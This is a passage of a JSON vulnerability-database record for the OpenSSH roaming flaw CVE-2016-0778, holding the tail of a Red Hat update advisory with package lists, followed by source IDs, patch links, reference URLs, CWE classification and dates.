7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nppc64:\nopenssh-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-clients-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-6.6.1p1-23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-clients-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-6.6.1p1-23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64.rpm\n\nppc64le:\nopenssh-debuginfo-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.ppc64le.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.ppc64le.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.ppc64le.rpm\n\ns390x:\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.s390x.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.s390x.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.s390x.rpm\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssh-6.6.1p1-23.el7_2.src.rpm\n\nx86_64:\nopenssh-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-askpass-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-clients-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-keycat-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-6.6.1p1-23.el7_2.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssh-debuginfo-6.6.1p1-23.el7_2.i686.rpm\nopenssh-debuginfo-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-ldap-6.6.1p1-23.el7_2.x86_64.rpm\nopenssh-server-sysvinit-6.6.1p1-23.el7_2.x86_64.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.i686.rpm\npam_ssh_agent_auth-0.9.3-9.23.el7_2.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-0777\nhttps://access.redhat.com/security/cve/CVE-2016-0778\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/articles/2123781\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWmAWQXlSAg2UNWIIRAh17AJ9SiT1MA1YtOA6ctMp9jIo4e9XrFwCgkbmo\nnXgYWs8cZcyoTRVoriTGHQo=\n=1sk9\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2016-0778" }, { "db": "CERT/CC", "id": "VU#456088" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "BID", "id": "80698" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" } ], "trust": 3.42 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-0778", "trust": 4.4 }, { "db": "BID", "id": "80698", "trust": 2.1 }, { "db": "JUNIPER", "id": "JSA10734", "trust": 2.1 }, { "db": "CERT/CC", "id": "VU#456088", "trust": 2.0 }, { "db": "PACKETSTORM", "id": "135273", "trust": 1.9 }, { "db": "SECTRACK", "id": "1034671", "trust": 1.8 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2016/01/14/7", "trust": 1.8 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.8 }, { "db": "JVN", "id": "JVNVU95595627", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU97668313", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-001117", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.7 }, { "db": "JUNIPER", "id": "JSA10774", "trust": 0.3 }, { "db": "SEEBUG", "id": "SSVID-90447", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-88288", "trust": 0.1 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-0778", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135259", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135282", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138552", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "136346", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "135263", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "id": "VAR-201601-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-88288" } ], "trust": 0.01 }, "last_update_date": "2024-11-29T21:10:52.939000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2016-03-21-5 OS X El Capitan 10.11.4 and Security Update 2016-002", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2016/Mar/msg00004.html" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/en-us/HT206167" }, { "title": "HT206167", "trust": 0.8, "url": "https://support.apple.com/ja-jp/HT206167" }, { "title": "HPSBGN03638", "trust": 0.8, "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375" }, { "title": "AXSA:2016-037:01", "trust": 0.8, "url": "https://tsn.miraclelinux.com/ja/node/6397" }, { "title": "release-7.1p2", "trust": 0.8, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "title": "Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "title": "Oracle Linux Bulletin - January 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "title": "UTM Up2Date 9.354 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "title": "UTM Up2Date 9.319 released", "trust": 0.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "title": "OpenSSH Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=59597" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/05/05/juniper_patches_opensshs_roaming_bug_in_junos_os/" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2016/01/14/openssh_is_wide_open_to_key_theft_thanks_to_roaming_flaw/" }, { "title": "Ubuntu Security Notice: openssh vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2869-1" }, { "title": "Debian Security Advisories: DSA-3446-1 openssh -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ae57bf01ef5062fb12be694f4a95eb69" }, { "title": "Debian CVElist Bug Report Logs: openssh-client: CVE-2016-0777", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=5382b188b84b87a2670c7f1e661e15b8" }, { "title": "Amazon Linux AMI: ALAS-2016-638", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2016-638" }, { "title": "Red Hat: CVE-2016-0778", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2016-0778" }, { "title": "Symantec Security Advisories: SA109 : Multiple OpenSSH Vulnerabilities (January 2016)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=ef164fe57ef1d1217ba2dc664dcecce2" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=92308e3c4d305e91c2eba8c9c6835e83" }, { "title": "puppet-module-ssh", "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh " }, { "title": "fabric2", "trust": 0.1, "url": "https://github.com/WinstonN/fabric2 " }, { "title": "", "trust": 0.1, "url": "https://github.com/cpcloudnl/ssh-config " }, { "title": "Linux_command_crash_course", "trust": 0.1, "url": "https://github.com/akshayprasad/Linux_command_crash_course " }, { "title": "nmap", "trust": 0.1, "url": "https://github.com/project7io/nmap " }, { "title": "DC-2-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/DC-2-Vulnhub-Walkthrough " }, { "title": "DC-1-Vulnhub-Walkthrough", "trust": 0.1, "url": "https://github.com/vshaliii/DC-1-Vulnhub-Walkthrough " }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/RedHatSatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.9, "url": "http://www.openssh.com/txt/release-7.1p2" }, { "trust": 2.4, "url": "http://www.securityfocus.com/bid/80698" }, { "trust": 2.4, "url": "http://www.debian.org/security/2016/dsa-3446" }, { "trust": 2.4, "url": "http://packetstormsecurity.com/files/135273/qualys-security-advisory-openssh-overflow-leak.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinoct2015-2511968.html" }, { "trust": 2.1, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html" }, { "trust": 2.0, "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" }, { "trust": 1.9, "url": "https://security.gentoo.org/glsa/201601-01" }, { "trust": 1.8, "url": "http://lists.apple.com/archives/security-announce/2016/mar/msg00004.html" }, { "trust": 1.8, "url": "http://www.securityfocus.com/archive/1/537295/100/0/threaded" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/" }, { "trust": 1.8, "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/" }, { "trust": 1.8, "url": "https://bto.bluecoat.com/security-advisory/sa109" }, { "trust": 1.8, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05247375" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680" }, { "trust": 1.8, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722" }, { "trust": 1.8, "url": "https://support.apple.com/ht206167" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-february/176516.html" }, { "trust": 1.8, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-january/176349.html" }, { "trust": 1.8, "url": "http://seclists.org/fulldisclosure/2016/jan/44" }, { "trust": 1.8, "url": "http://www.openwall.com/lists/oss-security/2016/01/14/7" }, { "trust": 1.8, "url": "http://www.securitytracker.com/id/1034671" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00006.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00007.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00008.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00009.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00013.html" }, { "trust": 1.8, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-01/msg00014.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-2869-1" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734" }, { "trust": 1.6, "url": "http://undeadly.org/cgi?action=article\u0026sid=20160114142733" }, { "trust": 1.2, "url": "https://www.kb.cert.org/vuls/id/456088" }, { "trust": 1.1, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.7/common/022_ssh.patch.sig" }, { "trust": 1.1, "url": "http://www.ubuntu.com/usn/usn-2869-1/" }, { "trust": 0.9, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0777" }, { "trust": 0.9, "url": "https://access.redhat.com/articles/2123781" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-0778" }, { "trust": 0.8, "url": "https://github.com/openssh/openssh-portable/blob/8408218c1ca88cb17d15278174a24a94a6f65fe1/roaming_client.c#l70" }, { "trust": 0.8, "url": "https://isc.sans.edu/forums/diary/openssh+71p2+released+with+security+fix+for+cve20160777/20613/" }, { "trust": 0.8, "url": "https://security-tracker.debian.org/tracker/cve-2016-0778" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu95595627/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97668313" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-0778" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0778" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0777" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05247375" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2016-0043.html" }, { "trust": 0.3, "url": "http://www.openssh.com" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10734\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10774\u0026actp=rss" }, { "trust": 0.3, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.8/common/010_ssh.patch.sig" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023271" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023319" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5099309" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021138" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssh_advisory7.asc" }, { "trust": 0.3, "url": "https://securityadvisories.paloaltonetworks.com/home/detail/44" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21978487" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000044" }, { "trust": 0.3, "url": "https://gtacknowledge.extremenetworks.com/articles/vulnerability_notice/vn-2016-001-openssh" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021109" }, { "trust": 0.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10734" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://github.com/ghoneycutt/puppet-module-ssh" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/msc06-c.+beware+of+compiler+optimizations" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/14.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem06-c.+ensure+that+sensitive+data+is+not+written+out+to+disk" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/244.html" }, { "trust": 0.1, "url": "https://www.securecoding.cert.org/confluence/display/c/mem03-c.+clear+sensitive+information+stored+in+reusable+resources" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "http://www.openssh.com/legacy.html" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3200" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "https://www.hpe.com/info/report-security-vulnerability" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7551" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8659" }, { "trust": 0.1, "url": "https://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8472" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1819" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7499" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0801" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8242" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8126" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht206171" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1732" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5312" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7500" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9495" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1734" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1740" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5334" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1733" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1736" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1735" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5333" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0802" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1738" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1737" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0777" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-0778" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0777" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0778" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "PACKETSTORM", "id": "135273" }, { "db": "PACKETSTORM", "id": "135259" }, { "db": "PACKETSTORM", "id": "135282" }, { "db": "PACKETSTORM", "id": "138552" }, { "db": "PACKETSTORM", "id": "136346" }, { "db": "PACKETSTORM", "id": "135283" }, { "db": "PACKETSTORM", "id": "135263" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-14T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2016-01-14T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2016-01-14T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80698" }, { "date": "2016-01-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2016-01-15T02:09:54", "db": "PACKETSTORM", "id": "135273" }, { "date": "2016-01-15T00:03:14", "db": "PACKETSTORM", "id": "135259" }, { "date": "2016-01-15T13:35:04", "db": "PACKETSTORM", "id": "135282" }, { "date": "2016-08-30T14:19:12", "db": "PACKETSTORM", "id": "138552" }, { "date": "2016-03-22T15:18:02", "db": "PACKETSTORM", "id": "136346" }, { "date": "2016-01-18T04:26:08", "db": "PACKETSTORM", "id": "135283" }, { "date": "2016-01-15T00:04:21", "db": "PACKETSTORM", "id": "135263" }, { "date": "2016-01-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2016-01-14T22:59:02.280000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-20T00:00:00", "db": "CERT/CC", "id": "VU#456088" }, { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-88288" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2016-0778" }, { "date": "2017-01-23T03:06:00", "db": "BID", "id": "80698" }, { "date": "2016-10-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-250" }, { "date": "2024-11-21T02:42:21.793000", "db": "NVD", "id": "CVE-2016-0778" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138552" }, { "db": "CNNVD", "id": "CNNVD-201601-250" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSH Client contains a client information leak vulnerability and 